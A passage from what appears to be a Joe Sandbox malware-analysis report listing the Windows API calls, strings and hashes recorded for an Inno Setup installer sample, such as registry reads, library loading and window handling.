                                                                                                                              • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                              • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                                              • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                              • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                              • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                                              • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF561FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                            • String ID: Setup
                                                                                                                            • API String ID: 629812316-3839654196
                                                                                                                            • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                            • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                                            • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue
                                                                                                                            • String ID: $=H
                                                                                                                            • API String ID: 3660427363-3538597426
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID: .tmp
                                                                                                                            • API String ID: 1375471231-2986845003
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                              • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                              • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                              • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                              • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                                              • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                                            • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                            • API String ID: 3869789854-2936008475
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                            • String ID: T$H
                                                                                                                            • API String ID: 2018770650-488339322
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                            • API String ID: 3535843008-1113070880
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CreateFile
                                                                                                                            • API String ID: 2528220319-823142352
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                                            • API String ID: 71445658-2565060666
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
Strings
Similarity
• API ID: AddressErrorInitializeLibraryLoadModeProc
• String ID: SHCreateItemFromParsingName$shell32.dll
• API String ID: 2906209438-2320870614
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
Strings
Similarity
• API ID: AddressErrorLibraryLoadModeProc
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2492108670-2683653824
Uniqueness
• Uniqueness Score: -1.00%
APIs
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
Similarity
• API ID: AddressLibraryLoadProc
• String ID:
• API String ID: 2574300362-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
Similarity
• API ID: Menu$Append$System
• String ID:
• API String ID: 1489644407-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
• TranslateMessage.USER32(?), ref: 0042448F
• DispatchMessageA.USER32(?), ref: 00424499
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SetPropA.USER32(00000000,00000000), ref: 0041666A
• SetPropA.USER32(00000000,00000000), ref: 0041667F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• IsWindowVisible.USER32(?), ref: 0041EE64
• IsWindowEnabled.USER32(?), ref: 0041EE6E
• EnableWindow.USER32(?,00000000), ref: 0041EE94
Similarity
• API ID: Window$EnableEnabledVisible
• String ID:
• API String ID: 3234591441-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GlobalHandle.KERNEL32 ref: 00406289
                                                                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 00406290
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406295
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$FreeHandleWire
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 318822183-0
                                                                                                                            • Opcode ID: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                            • Instruction ID: 0bd3332245bc481727117fba3a6c85ee4c387b864c86d5f24a339be909c9c9d3
                                                                                                                            • Opcode Fuzzy Hash: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                            • Instruction Fuzzy Hash: 4FA001C4800A01A9DC0432B2080B93B200CD84122C390096B3408BA182887C88401A3D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ActiveWindow
                                                                                                                            • String ID: PrepareToInstall
                                                                                                                            • API String ID: 2558294473-1101760603
                                                                                                                            • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                            • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                                            • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                            • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: /:*?"<>|
                                                                                                                            • API String ID: 0-4078764451
                                                                                                                            • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                            • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                                            • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                            • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ActiveWindow
                                                                                                                            • String ID: InitializeWizard
                                                                                                                            • API String ID: 2558294473-2356795471
                                                                                                                            • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                            • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                                            • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                            • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                                            Strings
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                                            • API String ID: 47109696-1019749484
                                                                                                                            • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                            • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                                                            • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                            • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                            Strings
                                                                                                                            • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: Inno Setup: Setup Version
                                                                                                                            • API String ID: 3702945584-4166306022
                                                                                                                            • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                            • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                                                            • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                            • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: NoModify
                                                                                                                            • API String ID: 3702945584-1699962838
                                                                                                                            • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                            • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                                                            • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                            • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                                              • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                                              • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                                              • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                                            • SendNotifyMessageA.USER32(0004043A,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2649214853-0
                                                                                                                            • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                            • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                                                            • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                            • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                                              • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMetricsMultiSystemWide
                                                                                                                            • String ID: /G
                                                                                                                            • API String ID: 224039744-2088674125
                                                                                                                            • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                            • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                                                            • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                            • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                                            • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
